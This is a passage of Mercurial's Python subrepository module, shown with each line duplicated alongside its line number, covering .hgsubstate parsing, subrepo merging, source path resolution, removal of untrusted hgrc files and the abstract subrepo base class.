114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
115 l = l.lstrip()
115 l = l.lstrip()
116 if not l:
116 if not l:
117 continue
117 continue
118 try:
118 try:
119 revision, path = l.split(" ", 1)
119 revision, path = l.split(" ", 1)
120 except ValueError:
120 except ValueError:
121 raise error.Abort(_("invalid subrepository revision "
121 raise error.Abort(_("invalid subrepository revision "
122 "specifier in \'%s\' line %d")
122 "specifier in \'%s\' line %d")
123 % (repo.pathto('.hgsubstate'), (i + 1)))
123 % (repo.pathto('.hgsubstate'), (i + 1)))
124 rev[path] = revision
124 rev[path] = revision
125 except IOError as err:
125 except IOError as err:
126 if err.errno != errno.ENOENT:
126 if err.errno != errno.ENOENT:
127 raise
127 raise
128
128
129 def remap(src):
129 def remap(src):
130 for pattern, repl in p.items('subpaths'):
130 for pattern, repl in p.items('subpaths'):
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
132 # does a string decode.
132 # does a string decode.
133 repl = util.escapestr(repl)
133 repl = util.escapestr(repl)
134 # However, we still want to allow back references to go
134 # However, we still want to allow back references to go
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
136 # extra escapes are needed because re.sub string decodes.
136 # extra escapes are needed because re.sub string decodes.
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
138 try:
138 try:
139 src = re.sub(pattern, repl, src, 1)
139 src = re.sub(pattern, repl, src, 1)
140 except re.error as e:
140 except re.error as e:
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
142 % (p.source('subpaths', pattern), e))
142 % (p.source('subpaths', pattern), e))
143 return src
143 return src
144
144
145 state = {}
145 state = {}
146 for path, src in p[''].items():
146 for path, src in p[''].items():
147 kind = 'hg'
147 kind = 'hg'
148 if src.startswith('['):
148 if src.startswith('['):
149 if ']' not in src:
149 if ']' not in src:
150 raise error.Abort(_('missing ] in subrepository source'))
150 raise error.Abort(_('missing ] in subrepository source'))
151 kind, src = src.split(']', 1)
151 kind, src = src.split(']', 1)
152 kind = kind[1:]
152 kind = kind[1:]
153 src = src.lstrip() # strip any extra whitespace after ']'
153 src = src.lstrip() # strip any extra whitespace after ']'
154
154
155 if not util.url(src).isabs():
155 if not util.url(src).isabs():
156 parent = _abssource(repo, abort=False)
156 parent = _abssource(repo, abort=False)
157 if parent:
157 if parent:
158 parent = util.url(parent)
158 parent = util.url(parent)
159 parent.path = posixpath.join(parent.path or '', src)
159 parent.path = posixpath.join(parent.path or '', src)
160 parent.path = posixpath.normpath(parent.path)
160 parent.path = posixpath.normpath(parent.path)
161 joined = str(parent)
161 joined = str(parent)
162 # Remap the full joined path and use it if it changes,
162 # Remap the full joined path and use it if it changes,
163 # else remap the original source.
163 # else remap the original source.
164 remapped = remap(joined)
164 remapped = remap(joined)
165 if remapped == joined:
165 if remapped == joined:
166 src = remap(src)
166 src = remap(src)
167 else:
167 else:
168 src = remapped
168 src = remapped
169
169
170 src = remap(src)
170 src = remap(src)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
172
172
173 return state
173 return state
174
174
175 def writestate(repo, state):
175 def writestate(repo, state):
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
178 if state[s][1] != nullstate[1]]
178 if state[s][1] != nullstate[1]]
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
180
180
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
182 """delegated from merge.applyupdates: merging of .hgsubstate file
182 """delegated from merge.applyupdates: merging of .hgsubstate file
183 in working context, merging context and ancestor context"""
183 in working context, merging context and ancestor context"""
184 if mctx == actx: # backwards?
184 if mctx == actx: # backwards?
185 actx = wctx.p1()
185 actx = wctx.p1()
186 s1 = wctx.substate
186 s1 = wctx.substate
187 s2 = mctx.substate
187 s2 = mctx.substate
188 sa = actx.substate
188 sa = actx.substate
189 sm = {}
189 sm = {}
190
190
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
192
192
193 def debug(s, msg, r=""):
193 def debug(s, msg, r=""):
194 if r:
194 if r:
195 r = "%s:%s:%s" % r
195 r = "%s:%s:%s" % r
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
197
197
198 promptssrc = filemerge.partextras(labels)
198 promptssrc = filemerge.partextras(labels)
199 for s, l in sorted(s1.iteritems()):
199 for s, l in sorted(s1.iteritems()):
200 prompts = None
200 prompts = None
201 a = sa.get(s, nullstate)
201 a = sa.get(s, nullstate)
202 ld = l # local state with possible dirty flag for compares
202 ld = l # local state with possible dirty flag for compares
203 if wctx.sub(s).dirty():
203 if wctx.sub(s).dirty():
204 ld = (l[0], l[1] + "+")
204 ld = (l[0], l[1] + "+")
205 if wctx == actx: # overwrite
205 if wctx == actx: # overwrite
206 a = ld
206 a = ld
207
207
208 prompts = promptssrc.copy()
208 prompts = promptssrc.copy()
209 prompts['s'] = s
209 prompts['s'] = s
210 if s in s2:
210 if s in s2:
211 r = s2[s]
211 r = s2[s]
212 if ld == r or r == a: # no change or local is newer
212 if ld == r or r == a: # no change or local is newer
213 sm[s] = l
213 sm[s] = l
214 continue
214 continue
215 elif ld == a: # other side changed
215 elif ld == a: # other side changed
216 debug(s, "other changed, get", r)
216 debug(s, "other changed, get", r)
217 wctx.sub(s).get(r, overwrite)
217 wctx.sub(s).get(r, overwrite)
218 sm[s] = r
218 sm[s] = r
219 elif ld[0] != r[0]: # sources differ
219 elif ld[0] != r[0]: # sources differ
220 prompts['lo'] = l[0]
220 prompts['lo'] = l[0]
221 prompts['ro'] = r[0]
221 prompts['ro'] = r[0]
222 if repo.ui.promptchoice(
222 if repo.ui.promptchoice(
223 _(' subrepository sources for %(s)s differ\n'
223 _(' subrepository sources for %(s)s differ\n'
224 'use (l)ocal%(l)s source (%(lo)s)'
224 'use (l)ocal%(l)s source (%(lo)s)'
225 ' or (r)emote%(o)s source (%(ro)s)?'
225 ' or (r)emote%(o)s source (%(ro)s)?'
226 '$$ &Local $$ &Remote') % prompts, 0):
226 '$$ &Local $$ &Remote') % prompts, 0):
227 debug(s, "prompt changed, get", r)
227 debug(s, "prompt changed, get", r)
228 wctx.sub(s).get(r, overwrite)
228 wctx.sub(s).get(r, overwrite)
229 sm[s] = r
229 sm[s] = r
230 elif ld[1] == a[1]: # local side is unchanged
230 elif ld[1] == a[1]: # local side is unchanged
231 debug(s, "other side changed, get", r)
231 debug(s, "other side changed, get", r)
232 wctx.sub(s).get(r, overwrite)
232 wctx.sub(s).get(r, overwrite)
233 sm[s] = r
233 sm[s] = r
234 else:
234 else:
235 debug(s, "both sides changed")
235 debug(s, "both sides changed")
236 srepo = wctx.sub(s)
236 srepo = wctx.sub(s)
237 prompts['sl'] = srepo.shortid(l[1])
237 prompts['sl'] = srepo.shortid(l[1])
238 prompts['sr'] = srepo.shortid(r[1])
238 prompts['sr'] = srepo.shortid(r[1])
239 option = repo.ui.promptchoice(
239 option = repo.ui.promptchoice(
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
241 'remote revision: %(sr)s)\n'
241 'remote revision: %(sr)s)\n'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
243 '$$ &Merge $$ &Local $$ &Remote')
243 '$$ &Merge $$ &Local $$ &Remote')
244 % prompts, 0)
244 % prompts, 0)
245 if option == 0:
245 if option == 0:
246 wctx.sub(s).merge(r)
246 wctx.sub(s).merge(r)
247 sm[s] = l
247 sm[s] = l
248 debug(s, "merge with", r)
248 debug(s, "merge with", r)
249 elif option == 1:
249 elif option == 1:
250 sm[s] = l
250 sm[s] = l
251 debug(s, "keep local subrepo revision", l)
251 debug(s, "keep local subrepo revision", l)
252 else:
252 else:
253 wctx.sub(s).get(r, overwrite)
253 wctx.sub(s).get(r, overwrite)
254 sm[s] = r
254 sm[s] = r
255 debug(s, "get remote subrepo revision", r)
255 debug(s, "get remote subrepo revision", r)
256 elif ld == a: # remote removed, local unchanged
256 elif ld == a: # remote removed, local unchanged
257 debug(s, "remote removed, remove")
257 debug(s, "remote removed, remove")
258 wctx.sub(s).remove()
258 wctx.sub(s).remove()
259 elif a == nullstate: # not present in remote or ancestor
259 elif a == nullstate: # not present in remote or ancestor
260 debug(s, "local added, keep")
260 debug(s, "local added, keep")
261 sm[s] = l
261 sm[s] = l
262 continue
262 continue
263 else:
263 else:
264 if repo.ui.promptchoice(
264 if repo.ui.promptchoice(
265 _(' local%(l)s changed subrepository %(s)s'
265 _(' local%(l)s changed subrepository %(s)s'
266 ' which remote%(o)s removed\n'
266 ' which remote%(o)s removed\n'
267 'use (c)hanged version or (d)elete?'
267 'use (c)hanged version or (d)elete?'
268 '$$ &Changed $$ &Delete') % prompts, 0):
268 '$$ &Changed $$ &Delete') % prompts, 0):
269 debug(s, "prompt remove")
269 debug(s, "prompt remove")
270 wctx.sub(s).remove()
270 wctx.sub(s).remove()
271
271
272 for s, r in sorted(s2.items()):
272 for s, r in sorted(s2.items()):
273 prompts = None
273 prompts = None
274 if s in s1:
274 if s in s1:
275 continue
275 continue
276 elif s not in sa:
276 elif s not in sa:
277 debug(s, "remote added, get", r)
277 debug(s, "remote added, get", r)
278 mctx.sub(s).get(r)
278 mctx.sub(s).get(r)
279 sm[s] = r
279 sm[s] = r
280 elif r != sa[s]:
280 elif r != sa[s]:
281 prompts = promptssrc.copy()
281 prompts = promptssrc.copy()
282 prompts['s'] = s
282 prompts['s'] = s
283 if repo.ui.promptchoice(
283 if repo.ui.promptchoice(
284 _(' remote%(o)s changed subrepository %(s)s'
284 _(' remote%(o)s changed subrepository %(s)s'
285 ' which local%(l)s removed\n'
285 ' which local%(l)s removed\n'
286 'use (c)hanged version or (d)elete?'
286 'use (c)hanged version or (d)elete?'
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
288 debug(s, "prompt recreate", r)
288 debug(s, "prompt recreate", r)
289 mctx.sub(s).get(r)
289 mctx.sub(s).get(r)
290 sm[s] = r
290 sm[s] = r
291
291
292 # record merged .hgsubstate
292 # record merged .hgsubstate
293 writestate(repo, sm)
293 writestate(repo, sm)
294 return sm
294 return sm
295
295
296 def _updateprompt(ui, sub, dirty, local, remote):
296 def _updateprompt(ui, sub, dirty, local, remote):
297 if dirty:
297 if dirty:
298 msg = (_(' subrepository sources for %s differ\n'
298 msg = (_(' subrepository sources for %s differ\n'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
300 '$$ &Local $$ &Remote')
300 '$$ &Local $$ &Remote')
301 % (subrelpath(sub), local, remote))
301 % (subrelpath(sub), local, remote))
302 else:
302 else:
303 msg = (_(' subrepository sources for %s differ (in checked out '
303 msg = (_(' subrepository sources for %s differ (in checked out '
304 'version)\n'
304 'version)\n'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
306 '$$ &Local $$ &Remote')
306 '$$ &Local $$ &Remote')
307 % (subrelpath(sub), local, remote))
307 % (subrelpath(sub), local, remote))
308 return ui.promptchoice(msg, 0)
308 return ui.promptchoice(msg, 0)
309
309
310 def reporelpath(repo):
310 def reporelpath(repo):
311 """return path to this (sub)repo as seen from outermost repo"""
311 """return path to this (sub)repo as seen from outermost repo"""
312 parent = repo
312 parent = repo
313 while util.safehasattr(parent, '_subparent'):
313 while util.safehasattr(parent, '_subparent'):
314 parent = parent._subparent
314 parent = parent._subparent
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
316
316
317 def subrelpath(sub):
317 def subrelpath(sub):
318 """return path to this subrepo as seen from outermost repo"""
318 """return path to this subrepo as seen from outermost repo"""
319 return sub._relpath
319 return sub._relpath
320
320
321 def _abssource(repo, push=False, abort=True):
321 def _abssource(repo, push=False, abort=True):
322 """return pull/push path of repo - either based on parent repo .hgsub info
322 """return pull/push path of repo - either based on parent repo .hgsub info
323 or on the top repo config. Abort or return None if no source found."""
323 or on the top repo config. Abort or return None if no source found."""
324 if util.safehasattr(repo, '_subparent'):
324 if util.safehasattr(repo, '_subparent'):
325 source = util.url(repo._subsource)
325 source = util.url(repo._subsource)
326 if source.isabs():
326 if source.isabs():
327 return str(source)
327 return str(source)
328 source.path = posixpath.normpath(source.path)
328 source.path = posixpath.normpath(source.path)
329 parent = _abssource(repo._subparent, push, abort=False)
329 parent = _abssource(repo._subparent, push, abort=False)
330 if parent:
330 if parent:
331 parent = util.url(util.pconvert(parent))
331 parent = util.url(util.pconvert(parent))
332 parent.path = posixpath.join(parent.path or '', source.path)
332 parent.path = posixpath.join(parent.path or '', source.path)
333 parent.path = posixpath.normpath(parent.path)
333 parent.path = posixpath.normpath(parent.path)
334 return str(parent)
334 return str(parent)
335 else: # recursion reached top repo
335 else: # recursion reached top repo
336 if util.safehasattr(repo, '_subtoppath'):
336 if util.safehasattr(repo, '_subtoppath'):
337 return repo._subtoppath
337 return repo._subtoppath
338 if push and repo.ui.config('paths', 'default-push'):
338 if push and repo.ui.config('paths', 'default-push'):
339 return repo.ui.config('paths', 'default-push')
339 return repo.ui.config('paths', 'default-push')
340 if repo.ui.config('paths', 'default'):
340 if repo.ui.config('paths', 'default'):
341 return repo.ui.config('paths', 'default')
341 return repo.ui.config('paths', 'default')
342 if repo.shared():
342 if repo.shared():
343 # chop off the .hg component to get the default path form
343 # chop off the .hg component to get the default path form
344 return os.path.dirname(repo.sharedpath)
344 return os.path.dirname(repo.sharedpath)
345 if abort:
345 if abort:
346 raise error.Abort(_("default path for subrepository not found"))
346 raise error.Abort(_("default path for subrepository not found"))
347
347
348 def _sanitize(ui, vfs, ignore):
348 def _sanitize(ui, vfs, ignore):
349 for dirname, dirs, names in vfs.walk():
349 for dirname, dirs, names in vfs.walk():
350 for i, d in enumerate(dirs):
350 for i, d in enumerate(dirs):
351 if d.lower() == ignore:
351 if d.lower() == ignore:
352 del dirs[i]
352 del dirs[i]
353 break
353 break
354 if vfs.basename(dirname).lower() != '.hg':
354 if vfs.basename(dirname).lower() != '.hg':
355 continue
355 continue
356 for f in names:
356 for f in names:
357 if f.lower() == 'hgrc':
357 if f.lower() == 'hgrc':
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
359 "in '%s'\n") % vfs.join(dirname))
359 "in '%s'\n") % vfs.join(dirname))
360 vfs.unlink(vfs.reljoin(dirname, f))
360 vfs.unlink(vfs.reljoin(dirname, f))
361
361
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
363 """return instance of the right subrepo class for subrepo in path"""
363 """return instance of the right subrepo class for subrepo in path"""
364 # subrepo inherently violates our import layering rules
364 # subrepo inherently violates our import layering rules
365 # because it wants to make repo objects from deep inside the stack
365 # because it wants to make repo objects from deep inside the stack
366 # so we manually delay the circular imports to not break
366 # so we manually delay the circular imports to not break
367 # scripts that don't use our demand-loading
367 # scripts that don't use our demand-loading
368 global hg
368 global hg
369 from . import hg as h
369 from . import hg as h
370 hg = h
370 hg = h
371
371
372 pathutil.pathauditor(ctx.repo().root)(path)
372 pathutil.pathauditor(ctx.repo().root)(path)
373 state = ctx.substate[path]
373 state = ctx.substate[path]
374 if state[2] not in types:
374 if state[2] not in types:
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
376 if allowwdir:
376 if allowwdir:
377 state = (state[0], ctx.subrev(path), state[2])
377 state = (state[0], ctx.subrev(path), state[2])
378 return types[state[2]](ctx, path, state[:2], allowcreate)
378 return types[state[2]](ctx, path, state[:2], allowcreate)
379
379
380 def nullsubrepo(ctx, path, pctx):
380 def nullsubrepo(ctx, path, pctx):
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
382 # subrepo inherently violates our import layering rules
382 # subrepo inherently violates our import layering rules
383 # because it wants to make repo objects from deep inside the stack
383 # because it wants to make repo objects from deep inside the stack
384 # so we manually delay the circular imports to not break
384 # so we manually delay the circular imports to not break
385 # scripts that don't use our demand-loading
385 # scripts that don't use our demand-loading
386 global hg
386 global hg
387 from . import hg as h
387 from . import hg as h
388 hg = h
388 hg = h
389
389
390 pathutil.pathauditor(ctx.repo().root)(path)
390 pathutil.pathauditor(ctx.repo().root)(path)
391 state = ctx.substate[path]
391 state = ctx.substate[path]
392 if state[2] not in types:
392 if state[2] not in types:
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
394 subrev = ''
394 subrev = ''
395 if state[2] == 'hg':
395 if state[2] == 'hg':
396 subrev = "0" * 40
396 subrev = "0" * 40
397 return types[state[2]](pctx, path, (state[0], subrev), True)
397 return types[state[2]](pctx, path, (state[0], subrev), True)
398
398
399 def newcommitphase(ui, ctx):
399 def newcommitphase(ui, ctx):
400 commitphase = phases.newcommitphase(ui)
400 commitphase = phases.newcommitphase(ui)
401 substate = getattr(ctx, "substate", None)
401 substate = getattr(ctx, "substate", None)
402 if not substate:
402 if not substate:
403 return commitphase
403 return commitphase
404 check = ui.config('phases', 'checksubrepos')
404 check = ui.config('phases', 'checksubrepos')
405 if check not in ('ignore', 'follow', 'abort'):
405 if check not in ('ignore', 'follow', 'abort'):
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
407 % (check))
407 % (check))
408 if check == 'ignore':
408 if check == 'ignore':
409 return commitphase
409 return commitphase
410 maxphase = phases.public
410 maxphase = phases.public
411 maxsub = None
411 maxsub = None
412 for s in sorted(substate):
412 for s in sorted(substate):
413 sub = ctx.sub(s)
413 sub = ctx.sub(s)
414 subphase = sub.phase(substate[s][1])
414 subphase = sub.phase(substate[s][1])
415 if maxphase < subphase:
415 if maxphase < subphase:
416 maxphase = subphase
416 maxphase = subphase
417 maxsub = s
417 maxsub = s
418 if commitphase < maxphase:
418 if commitphase < maxphase:
419 if check == 'abort':
419 if check == 'abort':
420 raise error.Abort(_("can't commit in %s phase"
420 raise error.Abort(_("can't commit in %s phase"
421 " conflicting %s from subrepository %s") %
421 " conflicting %s from subrepository %s") %
422 (phases.phasenames[commitphase],
422 (phases.phasenames[commitphase],
423 phases.phasenames[maxphase], maxsub))
423 phases.phasenames[maxphase], maxsub))
424 ui.warn(_("warning: changes are committed in"
424 ui.warn(_("warning: changes are committed in"
425 " %s phase from subrepository %s\n") %
425 " %s phase from subrepository %s\n") %
426 (phases.phasenames[maxphase], maxsub))
426 (phases.phasenames[maxphase], maxsub))
427 return maxphase
427 return maxphase
428 return commitphase
428 return commitphase
429
429
430 # subrepo classes need to implement the following abstract class:
430 # subrepo classes need to implement the following abstract class:
431
431
432 class abstractsubrepo(object):
432 class abstractsubrepo(object):
433
433
434 def __init__(self, ctx, path):
434 def __init__(self, ctx, path):
435 """Initialize abstractsubrepo part
435 """Initialize abstractsubrepo part
436
436
437 ``ctx`` is the context referring this subrepository in the
437 ``ctx`` is the context referring this subrepository in the
438 parent repository.
438 parent repository.
439
439
440 ``path`` is the path to this subrepository as seen from
440 ``path`` is the path to this subrepository as seen from
441 innermost repository.
441 innermost repository.
442 """
442 """
443 self.ui = ctx.repo().ui
443 self.ui = ctx.repo().ui
444 self._ctx = ctx
444 self._ctx = ctx
445 self._path = path
445 self._path = path
446
446
447 def addwebdirpath(self, serverpath, webconf):
447 def addwebdirpath(self, serverpath, webconf):
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
449
449
450 ``serverpath`` is the path component of the URL for this repo.
450 ``serverpath`` is the path component of the URL for this repo.
451
451
452 ``webconf`` is the dictionary of hgwebdir entries.
452 ``webconf`` is the dictionary of hgwebdir entries.
453 """
453 """
454 pass
454 pass
455
455
456 def storeclean(self, path):
456 def storeclean(self, path):
457 """
457 """
458 returns true if the repository has not changed since it was last
458 returns true if the repository has not changed since it was last
459 cloned from or pushed to a given repository.
459 cloned from or pushed to a given repository.
460 """
460 """
461 return False
461 return False
462
462
463 def dirty(self, ignoreupdate=False, missing=False):
463 def dirty(self, ignoreupdate=False, missing=False):
464 """returns true if the dirstate of the subrepo is dirty or does not
464 """returns true if the dirstate of the subrepo is dirty or does not
465 match current stored state. If ignoreupdate is true, only check
465 match current stored state. If ignoreupdate is true, only check
466 whether the subrepo has uncommitted changes in its dirstate. If missing
466 whether the subrepo has uncommitted changes in its dirstate. If missing
467 is true, check for deleted files.
467 is true, check for deleted files.
468 """
468 """
469 raise NotImplementedError
469 raise NotImplementedError
470
470
471 def dirtyreason(self, ignoreupdate=False, missing=False):
471 def dirtyreason(self, ignoreupdate=False, missing=False):
472 """return reason string if it is ``dirty()``
472 """return reason string if it is ``dirty()``
473
473
474 Returned string should have enough information for the message
474 Returned string should have enough information for the message
475 of exception.
475 of exception.
476
476
477 This returns None, otherwise.
477 This returns None, otherwise.
478 """
478 """
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
480 return _('uncommitted changes in subrepository "%s"'
480 return _('uncommitted changes in subrepository "%s"'
481 ) % subrelpath(self)
481 ) % subrelpath(self)
482
482
483 def bailifchanged(self, ignoreupdate=False, hint=None):
483 def bailifchanged(self, ignoreupdate=False, hint=None):
484 """raise Abort if subrepository is ``dirty()``
484 """raise Abort if subrepository is ``dirty()``
485 """
485 """
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
487 missing=True)
487 missing=True)
488 if dirtyreason:
488 if dirtyreason:
489 raise error.Abort(dirtyreason, hint=hint)
489 raise error.Abort(dirtyreason, hint=hint)
490
490
491 def basestate(self):
491 def basestate(self):
492 """current working directory base state, disregarding .hgsubstate
492 """current working directory base state, disregarding .hgsubstate
493 state and working directory modifications"""
493 state and working directory modifications"""
494 raise NotImplementedError
494 raise NotImplementedError
495
495
496 def checknested(self, path):
496 def checknested(self, path):
497 """check if path is a subrepository within this repository"""
497 """check if path is a subrepository within this repository"""
498 return False
498 return False
499
499
500 def commit(self, text, user, date):
500 def commit(self, text, user, date):
501 """commit the current changes to the subrepo with the given
501 """commit the current changes to the subrepo with the given
502 log message. Use given user and date if possible. Return the
502 log message. Use given user and date if possible. Return the
503 new state of the subrepo.
503 new state of the subrepo.
504 """
504 """
505 raise NotImplementedError
505 raise NotImplementedError
506
506
507 def phase(self, state):
507 def phase(self, state):
508 """returns phase of specified state in the subrepository.
508 """returns phase of specified state in the subrepository.
509 """
509 """
510 return phases.public
510 return phases.public
511
511
512 def remove(self):
512 def remove(self):
513 """remove the subrepo
513 """remove the subrepo
514
514
515 (should verify the dirstate is not dirty first)
515 (should verify the dirstate is not dirty first)
516 """
516 """
517 raise NotImplementedError
517 raise NotImplementedError
518
518
519 def get(self, state, overwrite=False):
519 def get(self, state, overwrite=False):
520 """run whatever commands are needed to put the subrepo into
520 """run whatever commands are needed to put the subrepo into
521 this state
521 this state
522 """
522 """
523 raise NotImplementedError
523 raise NotImplementedError
524
524
525 def merge(self, state):
525 def merge(self, state):
526 """merge currently-saved state with the new state."""
526 """merge currently-saved state with the new state."""
527 raise NotImplementedError
527 raise NotImplementedError
528
528
529 def push(self, opts):
529 def push(self, opts):
530 """perform whatever action is analogous to 'hg push'
530 """perform whatever action is analogous to 'hg push'
531
531
532 This may be a no-op on some systems.
532 This may be a no-op on some systems.
533 """
533 """
534 raise NotImplementedError
534 raise NotImplementedError
535
535
536 def add(self, ui, match, prefix, explicitonly, **opts):
536 def add(self, ui, match, prefix, explicitonly, **opts):
537 return []
537 return []
538
538
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
541 return 1
541 return 1
542
542
543 def cat(self, match, fm, fntemplate, prefix, **opts):
543 def cat(self, match, fm, fntemplate, prefix, **opts):
544 return 1
544 return 1
545
545
546 def status(self, rev2, **opts):
546 def status(self, rev2, **opts):
547 return scmutil.status([], [], [], [], [], [], [])
547 return scmutil.status([], [], [], [], [], [], [])
548
548
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
550 pass
550 pass
551
551
552 def outgoing(self, ui, dest, opts):
552 def outgoing(self, ui, dest, opts):
553 return 1
553 return 1
554
554
555 def incoming(self, ui, source, opts):
555 def incoming(self, ui, source, opts):
556 return 1
556 return 1
557
557
558 def files(self):
558 def files(self):
559 """return filename iterator"""
559 """return filename iterator"""
560 raise NotImplementedError
560 raise NotImplementedError
561
561
562 def filedata(self, name, decode):
562 def filedata(self, name, decode):
563 """return file data, optionally passed through repo decoders"""
563 """return file data, optionally passed through repo decoders"""
564 raise NotImplementedError
564 raise NotImplementedError
565
565
566 def fileflags(self, name):
566 def fileflags(self, name):
567 """return file flags"""
567 """return file flags"""
568 return ''
568 return ''
569
569
570 def getfileset(self, expr):
570 def getfileset(self, expr):
571 """Resolve the fileset expression for this repo"""
571 """Resolve the fileset expression for this repo"""
572 return set()
572 return set()
573
573
574 def printfiles(self, ui, m, fm, fmt, subrepos):
574 def printfiles(self, ui, m, fm, fmt, subrepos):
575 """handle the files command for this subrepo"""
575 """handle the files command for this subrepo"""
576 return 1
576 return 1
577
577
578 def archive(self, archiver, prefix, match=None, decode=True):
578 def archive(self, archiver, prefix, match=None, decode=True):
579 if match is not None:
579 if match is not None:
580 files = [f for f in self.files() if match(f)]
580 files = [f for f in self.files() if match(f)]
581 else:
581 else:
582 files = self.files()
582 files = self.files()
583 total = len(files)
583 total = len(files)
584 relpath = subrelpath(self)
584 relpath = subrelpath(self)
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
586 unit=_('files'), total=total)
586 unit=_('files'), total=total)
587 for i, name in enumerate(files):
587 for i, name in enumerate(files):
588 flags = self.fileflags(name)
588 flags = self.fileflags(name)
589 mode = 'x' in flags and 0o755 or 0o644
589 mode = 'x' in flags and 0o755 or 0o644
590 symlink = 'l' in flags
590 symlink = 'l' in flags
591 archiver.addfile(prefix + self._path + '/' + name,
591 archiver.addfile(prefix + self._path + '/' + name,
592 mode, symlink, self.filedata(name, decode))
592 mode, symlink, self.filedata(name, decode))
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
594 unit=_('files'), total=total)
594 unit=_('files'), total=total)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
596 return total
596 return total
597
597
598 def walk(self, match):
598 def walk(self, match):
599 '''
599 '''
600 walk recursively through the directory tree, finding all files
600 walk recursively through the directory tree, finding all files
601 matched by the match function
601 matched by the match function
602 '''
602 '''
603 pass
603 pass
604
604
605 def forget(self, match, prefix):
605 def forget(self, match, prefix):
606 return ([], [])
606 return ([], [])
607
607
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
609 """remove the matched files from the subrepository and the filesystem,
609 """remove the matched files from the subrepository and the filesystem,
610 possibly by force and/or after the file has been removed from the
610 possibly by force and/or after the file has been removed from the
611 filesystem. Return 0 on success, 1 on any warning.
611 filesystem. Return 0 on success, 1 on any warning.
612 """
612 """
613 warnings.append(_("warning: removefiles not implemented (%s)")
613 warnings.append(_("warning: removefiles not implemented (%s)")
614 % self._path)
614 % self._path)
615 return 1
615 return 1
616
616
617 def revert(self, substate, *pats, **opts):
617 def revert(self, substate, *pats, **opts):
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
619 % (substate[0], substate[2]))
619 % (substate[0], substate[2]))
620 return []
620 return []
621
621
622 def shortid(self, revid):
622 def shortid(self, revid):
623 return revid
623 return revid
624
624
625 def verify(self):
625 def verify(self):
626 '''verify the integrity of the repository. Return 0 on success or
626 '''verify the integrity of the repository. Return 0 on success or
627 warning, 1 on any error.
627 warning, 1 on any error.
628 '''
628 '''
629 return 0
629 return 0
630
630
631 @propertycache
631 @propertycache
632 def wvfs(self):
632 def wvfs(self):
633 """return vfs to access the working directory of this subrepository
633 """return vfs to access the working directory of this subrepository
634 """
634 """
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
636
636
637 @propertycache
